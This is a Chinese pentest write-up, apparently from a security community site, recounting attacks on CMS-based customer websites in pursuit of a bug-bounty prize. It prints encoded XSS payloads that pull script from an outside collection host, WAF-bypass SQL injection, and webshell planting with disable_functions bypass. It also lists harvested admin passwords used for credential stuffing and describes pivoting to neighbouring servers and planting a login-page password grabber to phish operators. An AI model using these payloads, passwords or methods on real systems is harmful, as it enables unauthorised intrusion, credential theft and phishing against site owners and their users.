作者：贝米少年

在漏洞盒子看到冰箱贴不错 刷点站

目标：还是建站系统（因为建站系统的客户基本都做seo 大概都是在权1左右 正好达标）

Nmap 扫一下端口 看到8888知道是宝塔 终于不是虚机了。。。 3389开启

尝试访问一下888/pma 8080 8888 8080访问不了

whatweb.bugscaner.com 查询一下服务器信息 得知 aspcms

查看旁站 tools.ipip.net/ 点进去看了几个 全是ASPCMS

试了一下网上的exp 都没有存在 应该都被修复了吧 后台也没找到

找到一个框框，尝试XSS 被拦了

使用不常见标签bypass 还是被拦了

burpsuite fuzz 找到几个200 的

在先知找了几个bypass payload 还是有过滤了

<video onkeyup=setTimeout'al\x65rt\x28/2/\x29'''>
<svg onmouseover=setTimeout'al\x65rt\x28/233/\x29'''>

实体16进制编码

WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<script sRC="https://xss.pt/aNWy"></script>>

以上实体16进制编码进行一次URL编码

%3Ciframe%20WIDTH%3D0%20HEIGHT%3D0%20srcdoc%3D%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%26%23x3C%3B%26%23x73%3B%26%23x43%3B%26%23x52%3B%26%23x69%3B%26%23x50%3B%26%23x74%3B%26%23x20%3B%26%23x73%3B%26%23x52%3B%26%23x43%3B%26%23x3D%3B%26%23x22%3B%26%23x68%3B%26%23x74%3B%26%23x74%3B%26%23x70%3B%26%23x73%3B%26%23x3A%3B%26%23x2F%3B%26%23x2F%3B%26%23x78%3B%26%23x73%3B%26%23x73%3B%26%23x2E%3B%26%23x70%3B%26%23x74%3B%26%23x2F%3B%26%23x61%3B%26%23x4E%3B%26%23x57%3B%26%23x79%3B%26%23x22%3B%26%23x3E%3B%26%23x3C%3B%26%23x2F%3B%26%23x73%3B%26%23x43%3B%26%23x72%3B%26%23x49%3B%26%23x70%3B%26%23x54%3B%26%23x3E%3B%3E

结果 xss没插进去 发现这儿好像可以执行SQL语句

旁站也是aspcms的 那个站一直跳转 用这个站尝试一下留言处注入把 返回500 没什么办法

找到一个移动端的留言板 插入<Img sRC=https://xss.pt/aNWyp.jpg%3E 没被拦

注入有点问题 没有回显 dnslog也没有 换个点

下载一个最新版本 找一下配置漏洞 发现之前的爆出来的数据库泄露 但是现在是这样了

Layer挖到些好东西 发现好多微擎cms的 找到几个注册点全都要审核

又找了一个 输入admin/ 自动跳转 尝试弱口令无果 去google一下漏洞把

版本太高 之前漏洞已经不存在 。。。。。 注册的账号 联系客服根本都不在阿 md

他们后台都自定义改过了 找一下客服人员跟他们要一下演示站点看看

没看懂他说的啥意思。。。。 这个人是个aspcms老用户了 aspcms官网有个技术群 这个技术群做了一个phootcms

发现他其他服务器上有phootcms 去找找弱口令 下载他那个PbootCMS 发现有一个data目录 访问并下载

默认安装的数据库 后台地址改过了

更新时间是2021 密码解出来是123456 但是有密码找不到后台

去某漏洞库翻一下 CVE-2018-16356 是个注入 api.php/List/index?order=123 先(select )

输入一个select 肯定拦截 他是有两层 先过宝塔 sel%0aect 空格字符是可以绕过的 防注入他是写在代码层的

没找到他防注入规则写在哪了 找找其他的旁站 发现一个漏网之鱼默认账号密码

后台模板添加一句话连上shell 用蚁剑bypass disable_functions

连接.antproxy.php 密码还是之前shell的密码 发现可以执行命令了

找找后台路径和弱口令好渗透其他服务器

找一个aspcms 或者pbootcms的站点 得知后台路径admin5566.php 去目标站点看一下

sqlite数据库

在static/backup/sql/下载数据文件

收集弱口令去撞库 这是在他网站里找到的弱口令

admin999mnmn

admin666888@

admin999ioio adminklkl777

admin666yuyu

admin666888ty

admin999mlml

通过弱口令进入另一个服务器的后台

后台GETSHELL 利用0day 修改白名单配置文件

登录后台->全局配置->配置参数->立刻提交，使用burp抓包。

在POST数据中添加一个：home_upload_ext=php 字段

参考：https://www.anquanke.com/post/id/222849#h2-7

上传文件exp：upload.html

  

上传不上去 利用1day文件包含 上传张图片马 然后包含 结果被拦了

pbootcms本人太菜没法shell 还有个办法就是继续撞库 我是废物没办法

在拿到shell的服务器上找另一个cms的站 在登陆写一个收取输入的密码

在模板上添加几个违禁词 然后告诉他们

然后去撞库 成功登陆

拿webshell 上传白名单拿不下 添加php黑名单 phtml 等不解析 nginx

撞到了另一个cms 登陆后台 看到有编辑模板功能 结果关闭了

添加后缀 没有用

内置 没啥用

emmmm.... 搞不下 去找找其他点 我是真废物

回到上面第一次撞库成功的那个cms 发现一个重装漏洞

找到站内资源 删除抓包

修改删除路径就行了

高版本没有这个洞 然后访问重装 结果远程调用数据库的时候一直空白 不知道怎么回事下期再说吧！！！

总结：

1.主站a服务器全是aspcms 网上的漏洞都试过了可能存在 但是 d盾绕不过去 通过网站名称 法人名称 666 123 888 这些爆破出后台地址

2.去找旗下的网站和服务器 先是通过弱口令拿到b服务器的后台然后webshell

2.再是解密去撞a 和 c服务器的库 成功撞到c服务器的库 拿到pbootcms的后台账号密码 没办法shell

3.拿到c服务器下的pbootcms的后台账号密码 没办法shell 另一个cms解密解不开通过钓鱼得到弱口令去撞库

4.得到c服务器的某后台然后发现重装漏洞 远程调用数据库的时候不生效 ！

本周六快手联合火线 举办线下「观火」白帽沙龙活动 ↓扫描二维码火速了解

【火线Zone】

火线Zone是[火线安全平台]运营的封闭式社区，社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入，符合要求的白帽子可联系[火小表妹]免费加入～

我们不希望出现劣币驱逐良币的结果，我们不希望一个技术社区变成一个水区！

欢迎具备分享精神的白帽子加入火线Zone，共建一个有技术氛围的优质社区！

为了冰箱贴的一次渗透测试相关推荐

1. 查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试

   在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息.SQL2000和SQL2005的结构略有不同. 系统表结构参考系统表详细说明. ...

2. 渗透测试:正义黑客的渗透测试以及该过程和黑客活动的区别

   2019独角兽企业重金招聘Python工程师标准>>> 渗透测试是正义黑客大展身手的地方.他们可以对漏洞评估中识别出的许多漏洞进行测试,以量化该漏洞带来的实际威胁和风险. 当正义黑客 ...

3. 渗透测试是否需要学习Linux

   渗透测试是一种利用模拟黑客攻击的手段,来评估生产系统的安全性能,用黑客惯用的破坏攻击方式,行的却是维护安全之事,也就是大家所说的白帽黑客.白帽黑客通常受雇于各大公司,是维护网络与计算机安全的主要力量. ...

4. 暗渡陈仓：用低消耗设备进行破解和渗透测试1.2.2　渗透测试工具集

   1.2.2 渗透测试工具集 Deck包含大量的渗透测试工具.设计理念是每个可能会用到的工具都应该包含进来,以确保在使用时无须下载额外的软件包.在渗透测试行动中给攻击机安装新的软件包很困难,轻则要费很大 ...

5. 电网机巡智能管控平台渗透测试经历

   目录 前言 渗透测试 概念 分类 手段 安全漏洞的影响 安全漏洞与BUG的关系 渗透测试的流程 明确目标 信息收集 漏洞扫描 漏洞利用 权限提升 痕迹清理 信息整理 分析报告及修复方案 前言 电网集训 ...

6. 渗透测试与自动化安全测试工具比较

   应用程序安全性并不新鲜,但它在需求.复杂性和深度方面正迅速增长.随着网络犯罪自疫情爆发以来增长了近600%,越来越多的SaaS企业开始争相保护他们的应用程序.即使那些运行最新端点保护的系统也面临重大漏 ...

7. 《树莓派渗透测试实战》——2.7　设置SSH服务

   本节书摘来自异步社区<树莓派渗透测试实战>一书中的第2章,第2.7节,作者[美]Joseph Muniz(约瑟夫 穆尼斯),Aamir Lakhani(阿米尔 拉克哈尼),朱筱丹 译,更多 ...

8. 【渗透测试学习平台】 web for pentester -1.介绍与安装

   web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术. 官网:https://www.pentesterlab.com 下载地址: ...

9. 《黑客秘笈——渗透测试实用指南（第2版）》目录—导读

   版权 黑客秘笈--渗透测试实用指南(第2版) • 著 [美] Peter Kim 译 孙 勇 责任编辑 傅道坤 • 人民邮电出版社出版发行 北京市丰台区成寿寺路11号 邮编 100164 电子邮件 3 ...

10. 《Nmap渗透测试指南》—第6章6.4节IP欺骗

    本节书摘来自异步社区<Nmap渗透测试指南>一书中的第6章6.4节IP欺骗,作者 商广明,更多章节内容可以访问云栖社区"异步社区"公众号查看. 6.4 IP欺骗 表6. ...

最新文章

1. 通过jstack定位在线运行java系统故障_案例1
2. 排优解难 网上邻居常遇故障解决方法
3. 如何为云部署安全开源代码？
4. 很多女生都这么干！效果就是可以很快换电脑……
5. PW Live直播 | 清华大学NLP组秦禹嘉：基于自然语言解释的数据增强
6. php 对象字面量,js的字面量对象和JSON的区别
7. CodeForces-1058B B. Vasya and Cornfield
8. 在编写异步方法时，使用 ConfigureAwait(false) 避免使用者死锁
9. python封装工具类多个项目使用_【arcpy项目实战】将多个点两两生成的最短路径pyhon代码封装入script中...
10. [汇编与C语言关系]1.函数调用
11. C++ 数字 4294967295是什么意思
12. capslock亮灯是小写_当CapsLock灯亮时,表示输入的字母是小写字母。
13. font-family：常用中文字体的英文名称 （宋体 微软雅黑）
14. 十步一拆：iPhone4S拆机十步曲
15. 1650显卡学计算机,1650ti显卡属于什么档次？
16. npm ERR! code EINVAL npm ERR! EINVAL: invalid argument, read
17. 即插即用和热插拔的区别
18. 采用fmm对gps data进行路径匹配
19. 光做魔杖，玩转液滴，登上《Science Advances》！
20. 体温单源码 delphi体温单源码 又叫三测单

热门文章

1. 2.（echarts篇）echarts颜色地图边缘高亮
2. froala富文本编辑器的使用
3. iOS 安装包瘦身 （上篇）
4. aws服务器修改root密码,使用Xshell登录AWS EC2服务器设置root+密码方式登录
5. 宝峰BF-888S对讲机写频！Android下的对讲机写频工具！
6. php输出cad文件,AutoCAD 二次开发 输出为WMF 或BMP文件
7. 浏览器上模拟qq的消息提示声/网页播放声音
8. 思科产品手册_品牌和CIS在中国的历史（六）：附下载世界帆船协会品牌管理手册...
9. 2019.11.28工作记录——InstallShield制作windriver驱动安装包
10. 《地理信息系统概论》课后习题全部答案_黄杏元